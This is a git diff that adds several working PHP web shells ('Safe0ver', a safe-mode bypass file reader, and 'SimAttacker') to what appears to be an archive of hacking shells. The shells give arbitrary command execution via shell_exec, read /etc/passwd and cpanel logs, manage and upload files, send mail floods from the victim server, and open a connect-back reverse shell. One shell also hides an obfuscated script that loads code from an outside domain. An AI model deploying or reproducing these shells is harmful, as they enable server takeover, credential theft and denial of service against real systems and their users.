+           echo "Are you sure you want to delete \"$file\" ?
+          <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+         <input type=\"hidden\" name=\"cmd\" value=\"delfile\">
+         <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
+         <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
+         <input type=\"hidden\" name=\"file\" value=\"$file\">
+         <input type=\"hidden\" name=\"auth\" value=\"yes\">
+
+         <input type=\"submit\" value=\"Yes\"></form>
+           <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+    <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+    <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+    <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
+        }
+     echo "</td></tr></center>";
+}
+elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
+    echo "<center><table><tr><td NOWRAP>";
+     $i = 1;
+     while (file_exists("$lastdir/newfile$i.txt"))
+         $i++;
+     $file = fopen("$lastdir/newfile$i.txt", "w+");
+     if ($file == false)
+         echo "Could not create the new file...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
+         echo "
+               <form action=\"$SFileName?$urlAdd\" method=\"POST\">
+            <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+            <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+            <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+            </form></center>
+             </td></tr></table></center>           ";
+    }
+elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
+    echo "<center><table><tr><td NOWRAP>" ;
+     $i = 1;
+     while (is_dir("$lastdir/newdir$i"))
+          $i++;
+     $file = mkdir("$lastdir/newdir$i", 0777);
+     if ($file == false)
+         echo "Could not create the new directory...<br>";
+     else
+         echo "Successfully created: \"$lastdir/newdir$i\"<br>";
+     echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
+        <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
+        <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
+        <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
+        </form></center></td></tr></table></center>";
+}
+elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
+    $contents = "";
+    $fc = @file( $file );
+      while ( @list( $ln, $line ) = each( $fc ) ) {
+          $contents .= htmlentities( $line ) ;
+     }
+     echo "<br><center><table><tr><td NOWRAP>";
+    echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+    echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
+    echo "<strong>EDIT FILE: </strong>$file<br>\n";
+    echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
+    echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
+    echo "<input type=\"submit\" value=\"Save\">";
+    echo "</form>";
+    echo "</td></tr></table></center>";
+}
+elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
+    $fo = fopen($file, "w");
+    $wrret = fwrite($fo, stripslashes($contents));
+    $clret = fclose($fo);
+}
+elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
+    $downloadfile = urldecode($file);
+    if (function_exists("basename"))
+            $downloadto = basename ($downloadfile);
+    else
+        $downloadto = "download.ext";
+    if (!file_exists("$downloadfile"))
+        echo "The file does not exist";
+    else {
+        $size = @filesize("$downloadfile");
+        if ($size != false) {
+            $add="; size=$size";
+        }            
+        else {
+            $add="";
+        }
+         header("Content-Type: application/download");
+        header("Content-Disposition: attachment; filename=$downloadto$add");
+        $fp=fopen("$downloadfile" ,"rb");
+        fpassthru($fp);
+        flush();
+    }
+}
+elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ 
+       ?>
+    <center>
+     <table>
+      <tr>
+       <td NOWRAP>
+            Dosya Yükleme Sekmesine Tikladiniz !
+        <br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
+      <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
+             <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
+             <input type="hidden" name="cmd" value="uploadproc">
+             <input type="hidden" name="dir" value="<?php echo $dir ?>">
+             <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
+             <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
+             Dosya Yükle:<br>
+             <input size="75" name="userfile" type="file"><br>
+             <input type="submit" value="Yükle">
+      </form>
+        <br>
+         <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
+            <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
+            <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
+            <input tabindex="0" type="submit" value="Iptal">
+        </form>
+    </td>
+   </tr>
+ </table>
+    </center>
+
+     <?php
+}
+elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
+    echo "<center><table><tr><td NOWRAP>";
+    if (file_exists($userfile))
+        $res = copy($userfile, "$dir/$userfile_name");
+    echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
+         if ($res) {
+        echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
+        echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
+        echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
+    }
+    else {
+        echo "Yüklenemedi...";
+    }
+    echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+    echo "<br><br></td></tr></table></center>";
+}
+elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
+        echo "<hr>"; 
+    $fc = @file( $file );      while ( @list( $ln, $line ) = each( $fc ) ) {
+          echo spacetonbsp(@htmlentities($line))."<br>\n";
+      }
+    echo "<hr>";
+}
+elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
+         if (function_exists('is_dir')) {
+         if (is_dir("$oldfile")) {
+             $objname = "Directory";
+             $objident = "Directory";
+          }
+         else {
+             $objname = "Filename";
+             $objident = "file";
+         }
+     }
+       echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
+    If (empty($newfile) != true) {
+         echo "<center>";
+         $return = @rename($oldfile, "$olddir$newfile");
+        if ($return) {
+             echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
+         }
+         else {
+             if ( @file_exists("$olddir$newfile") ) {
+                 echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
+             }
+             else {
+                 echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
+             }
+          }
+         echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
+     }
+     else {
+         $dpos = strrpos($oldfile, "/");
+         if (strval($dpos)!="") {
+             $olddir = substr($oldfile, 0, $dpos+1);
+           }
+         else {
+             $olddir = "$lastdir/";
+        }
+         $fpos = strrpos($oldfile, "/");
+         if (strval($fpos)!="") {
+             $inputfile = substr($oldfile, $fpos+1);
+           }
+         else {
+             $inputfile = "";
+         }
+               echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
+         echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
+         echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
+         echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
+         echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
+         echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
+         echo "Rename \"$oldfile\" to:<br>\n";
+         echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">"; 
+        echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
+         echo "</td></tr></table></center>";
+     }
+}
+else if ( $cmd == "con") {
+
+?>
+<center>
+<table>
+ <tr><td>&nbsp;</td>
+ </tr></table>
+<?php
+}    
+else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
+    $isMainMenu = true;
+     ?>
+    <table width="100%" border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="border">
+       <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+    <br>
+     <center>
+    <table border="0" NOWRAP>
+      <tr>
+      <td valign="top" class="silver border">
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?>      </td>
+       <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullaným:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
+        </span></td>
+     </tr>
+       </table>
+    <br><p><br>Safe Mode ByPAss<p><form method="POST">
+	<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
+	<input type="submit" value="Çalistir"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="dizin">
+                <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
+		<option value="cat /etc/passwd">cat /etc/passwd</option>
+		<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
+		<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
+		<option value="cat /etc/hosts">cat /etc/hosts</option>
+                <option value="cat /etc/named.conf">cat /etc/named.conf</option>
+                <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
+                <option value="netstat -an | grep -i listen">Açik Portlar</option>
+                <option value="ps -aux">Çalisan Uygulamalar</option>
+</select> <input type="submit" value="Çalistir"></p>
+	</form>
+------------------------------------------------------------------------------------<p>
+<?
+$evilc0der=$_POST['dizin'];
+if($_POST['dizin'])
+{
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$safemodgec = shell_exec($evilc0der);
+echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
+}
+?>
+<Script Language='Javascript'>
+<!-- HTML Encryption provided by iWEBTOOL.com -->
+<!--
+document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
+//-->
+</Script>
+</center>
+    <br>
+     <?php
+}
+
+if ($cmd != "downl") {
+    if ( $isMainMenu != true) {
+         ?>
+
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+         <tr>
+          <td width="100%" style="class="silver border">
+           <center><strong>
+            &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+            &nbsp;&nbsp;&nbsp;&nbsp;
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+            </strong></center>
+          </td>
+         </tr>
+        </table>
+        <br>
+        <?php
+}
+    ?>
+    <table width=100% border="0" cellpadding="0" cellspacing="0">
+     <tr>
+      <td width="100%" class="silver border">
+       <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+      </td>
+     </tr>
+    </table>
+        </td>
+  </tr>
+ </table>
+
+  <?php
+ }
+
+?> 
+
+
+
+
+ 
+
+
+
+
+
diff --git a/xakep-shells/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt b/xakep-shells/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt
new file mode 100644
index 0000000..ac5dc38
--- /dev/null
+++ b/xakep-shells/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt	
@@ -0,0 +1,89 @@
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+</head>
+<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
+<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="?	"><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe 
+Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
+<form method="POST">
+	<p align="center"><input type="text" name="file" size="20">
+	<input type="submit" value="Open" name="B1"></p>
+</form>
+	<form method="POST">
+		<p align="center"><select size="1" name="file">
+		<option value="/etc/passwd">Get /etc/passwd</option>
+		<option value="/var/cpanel/accounting.log">View cpanel logs</option>
+		<option value="/etc/syslog.conf">Syslog configuration</option>
+		<option value="/etc/hosts">Hosts</option>
+		</select> <input type="submit" value="Go" name="B1"></p>
+	</form>
+
+
+<?php
+/*
+Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
+by PHP Emperor<xb5@hotmail.com>
+*/
+
+echo "<head><title>Safe Mode Shell</title></head>"; 
+
+
+
+
+$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
+
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+echo("Safe-mode: $hsafemode");
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+echo("<br>");
+echo("Open base dir: $hopenbasedir");
+echo("<br>");
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+echo "<PRE>\n";
+if(empty($file)){
+if(empty($_GET['file'])){
+if(empty($_POST['file'])){
+die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
+COLOR=\"RED\">PHP Emperor
+xb5@hotmail.com</FONT></CENTER></B>");
+} else {
+$file=$_POST['file'];
+}
+} else {
+$file=$_GET['file'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "<B>--- Start File ".htmlspecialchars($file)."
+-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
+".htmlspecialchars($file)." ---------------\n";
+unlink($temp);
+die("\n<FONT COLOR=\"RED\"><B>File
+".htmlspecialchars($file)." has been already loaded. PHP Emperor <xb5@hotmail.com>
+;]</B></FONT>");
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt b/xakep-shells/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt
new file mode 100644
index 0000000..9d41bb6
--- /dev/null
+++ b/xakep-shells/PHP/SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt	
@@ -0,0 +1,378 @@
+<?
+//download Files  Code
+$fdownload=$_GET['fdownload'];
+if ($fdownload <> "" ){
+// path & file name
+$path_parts = pathinfo("$fdownload");
+$entrypath=$path_parts["basename"];
+$name = "$fdownload";
+$fp = fopen($name, 'rb');
+header("Content-Disposition: attachment; filename=$entrypath");
+header("Content-Length: " . filesize($name));
+fpassthru($fp);
+exit;
+}
+?>
+	
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="en-us">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
+<style>
+<!--
+body         { font-family: Tahoma; font-size: 8pt }
+-->
+</style>
+</head>
+<body>
+<?
+error_reporting(E_ERROR | E_WARNING | E_PARSE);
+
+ //File Edit
+ $fedit=$_GET['fedit'];
+ if ($fedit <> "" ){
+ $fedit=realpath($fedit);
+ $lines = file($fedit);
+ echo "<form action='' method='POST'>";
+echo "<textarea name='savefile' rows=30 cols=80>" ;
+foreach ($lines as $line_num => $line) {
+ echo htmlspecialchars($line);
+}
+echo "</textarea>
+	<input type='text' name='filepath'  size='60' value='$fedit'>
+	<input type='submit' value='save'></form>";
+	$savefile=$_POST['savefile'];
+	$filepath=realpath($_POST['filepath']);
+	if ($savefile <> "") 
+	{
+	$fp=fopen("$filepath","w+");
+	fwrite ($fp,"") ;
+	fwrite ($fp,$savefile) ;
+	fclose($fp);
+	echo "<script language='javascript'> close()</script>";
+	}
+exit();
+ }
+?>
+<?
+// CHmod - PRimission
+$fchmod=$_GET['fchmod'];
+if ($fchmod <> "" ){
+$fchmod=realpath($fchmod);
+echo "<center><br>
+chmod for :$fchmod<br>
+<form method='POST' action=''><br>
+Chmod :<br>
+<input type='text' name='chmod0' ><br>
+<input type='submit' value='change chmod'>
+</form>";
+$chmod0=$_POST['chmod0'];
+if ($chmod0 <> ""){
+chmod ($fchmod , $chmod0);
+}else {
+echo "primission Not Allow change Chmod";
+}
+exit();
+}
+?>
+	
+<div align="center">
+	<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
+		<tr>
+			<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
+				<p align="center"><b>
+				<font face="Tahoma" size="2"><br>
+				</font>
+				<font color="#D2D200" face="Tahoma" size="2">
+				<span style="text-decoration: none">
+				<font color="#000000">
+				<a href="?id=fm&dir=<?
+	echo getcwd();
+	?>
+	">
+				<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
+				<p align="center"><b><a href="?id=cmd">
+				<span style="text-decoration: none">
+				<font face="Tahoma" size="2" color="#000000">
+				CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
+				<p align="center"><b><a href="?id=fake-mail">
+				<font face="Tahoma" size="2" color="#000000">
+				<span style="text-decoration: none">Fake mail</span></font></a></b></p>
+				<p align="center"><b>
+				<font face="Tahoma" size="2" color="#000000">
+				<a href="?id=cshell">
+				<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
+				<p align="center"><b>
+				<font color="#000000" face="Tahoma" size="2">
+				<a href="?id=">
+				<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
+				<p>&nbsp;<p align="center">&nbsp;</td>
+			<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
+			<?
+			//*******************************************************
+			//Start Programs About US
+			$id=$_GET['id'];
+
+			if ($id=="") {
+			echo "
+			<font face='Arial Black' color='#808080' size='1'>
+***************************************************************************<br>
+&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
+&nbsp;Programer : Hossein Asgary <br>
+&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
+&nbsp;please : If you find bug or problems in program , tell me by : <br>
+&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
+Enjoy :) [Only 4 Best Friends ] <br>
+***************************************************************************</font></span></p>
+";
+
+echo "<font color='#333333' size='2'>OS :". php_uname();
+echo "<br>IP :". 
+($_SERVER['REMOTE_ADDR']);
+echo "</font>";
+
+
+			}
+			//************************************************************
+			//cmd-command line
+			$cmd=$_POST['cmd'];
+			if($id=="cmd"){
+		$result=shell_exec("$cmd");
+		echo "<br><center><h3> CMD ExeCute </h3></center>" ;
+		echo "<center>
+		<textarea rows=20 cols=70 >$result</textarea><br>
+		<form method='POST' action=''>
+		<input type='hidden' name='id' value='cmd'>
+		<input type='text' size='80' name='cmd' value='$cmd'>
+		<input type='submit' value='cmd'><br>";
+			
+			
+			
+			}
+			
+		//********************************************************	
+		
+		//fake mail = Use victim server 4 DOS - fake mail 
+		if ( $id=="fake-mail"){
+		error_reporting(0);
+		echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
+		echo "<center><form method='post' action=''>
+		Victim Mail :<br><input type='text' name='to' ><br>
+		Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
+		Comments:
+		<br>
+		<textarea rows='10' cols=50 name='Comments' ></textarea><br>
+		<input type='submit' value='Send Mail Strm ' >
+		</form></center>";
+		//send Storm Mail
+		$to=$_POST['to'];
+		$nom=$_POST['nom'];
+		$Comments=$_POST['Comments'];
+		if ($to <> "" ){
+		for ($i = 0; $i < $nom ; $i++){
+		$from = rand (71,1020000000)."@"."Attacker.com";
+		$subject= md5("$from");
+        mail($to,$subject,$Comments,"From:$from");
+        echo "$i is ok";
+        }      
+        echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
+        }
+		}
+		//********************************************************
+
+			//Connect Back -Firewall Bypass
+			if ($id=="cshell"){
+			echo "<br>Connect back Shell , bypass Firewalls<br>
+			For user :<br>
+			nc -l -p 1019 <br>
+			<hr>
+			<form method='POST' action=''><br>
+			Your IP & BindPort:<br>
+			<input type='text' name='mip' >
+			<input type='text' name='bport' size='5' value='1019'><br>
+			<input type='submit' value='Connect Back'>
+			</form>";
+		 $mip=$_POST['mip'];
+		 $bport=$_POST['bport'];
+		 if ($mip <> "")
+		 {
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+		 if (!$fp){
+		       $result = "Error: could not open socket connection";
+		 }
+		 else {
+		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
+	  while(!feof($fp)){ 
+       fputs ($fp," bash # ");
+       $result= fgets ($fp, 4096);
+      $message=`$result`;
+       fputs ($fp,"--> ".$message."\n");
+      }
+      fclose ($fp);
+		 }
+		 }
+			}
+			
+		//********************************************************
+			//Spy File Manager
+			$homedir=getcwd();
+			$dir=realpath($_GET['dir'])."/";
+			if ($id=="fm"){
+			echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
+                  &nbsp;<b>
+                  <form action='' method='GET'>
+                  &nbsp;Path:</b>
+                  <input type='hidden' name='id' value='fm'>
+                  <input type='text' name='dir' size='80' value='$dir'>
+                  <input type='submit' value='dir'>
+                  </form>
+                 <br>";
+
+			echo "
+
+<div align='center'>
+
+<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
+	<tr>
+		<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
+		<td height='28' width='82' align='center'>
+		<font color='#000080' size='2'><b>Size KByte</b></font></td>
+		<td height='28' width='83' align='center'>
+		<font color='#008000' size='2'><b>Download</b></font></td>
+		<td height='28' width='66' align='center'>
+		<font color='#FF9933' size='2'><b>Edit</b></font></td>
+		<td height='28' width='75' align='center'>
+		<font color='#999999' size='2'><b>Chmod</b></font></td>
+		<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
+	</tr>";
+		    if (is_dir($dir)){
+		    if ($dh=opendir($dir)){
+		    while (($file = readdir($dh)) !== false) {
+		    $fsize=round(filesize($dir . $file)/1024);
+		
+		    
+	echo " 
+	<tr>
+		<th width='250' height='22' align='left' nowrap>";
+		if (is_dir($dir.$file))
+		{
+		echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
+		}
+		else {
+		echo "<font size='2' color='#666666'>&nbsp;$file ";
+		}
+		echo "</a></font></th>
+		<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
+		if (is_file($dir.$file))
+		{
+		echo "$fsize";
+		}
+		else {
+		echo "&nbsp; ";
+		}
+		echo "
+		</b></font></td>
+		<td width='103' align='center' nowrap>";
+		if (is_file($dir.$file)){
+		if (is_readable($dir.$file)){
+		echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='77' align='center' nowrap>";
+		if (is_file($dir.$file))
+		{
+		if (is_readable($dir.$file)){
+		echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='86' align='center' nowrap>";
+		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+		echo "<font size='1' color='#999999'>Dont in windows";
+		}
+		else {
+		echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
+		}
+		echo "</a></font></td>
+		<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
+	</tr>
+	";
+		      }
+		      closedir($dh);
+		    } 
+		    }
+		    echo "</table>
+<form enctype='multipart/form-data' action='' method='POST'>
+ <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
+ Send this file: <input name='userfile' type='file' />
+ <inpt type='hidden' name='Fupath'  value='$dir'>
+ <input type='submit' value='Send File' />
+</form> 
+		    </div>";
+			}
+//Upload Files 
+$rpath=$_GET['dir'];
+if ($rpath <> "") {
+$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
+echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
+echo "<script language='javascript'> history.back(2)</script>";
+}
+ }
+ //file deleted
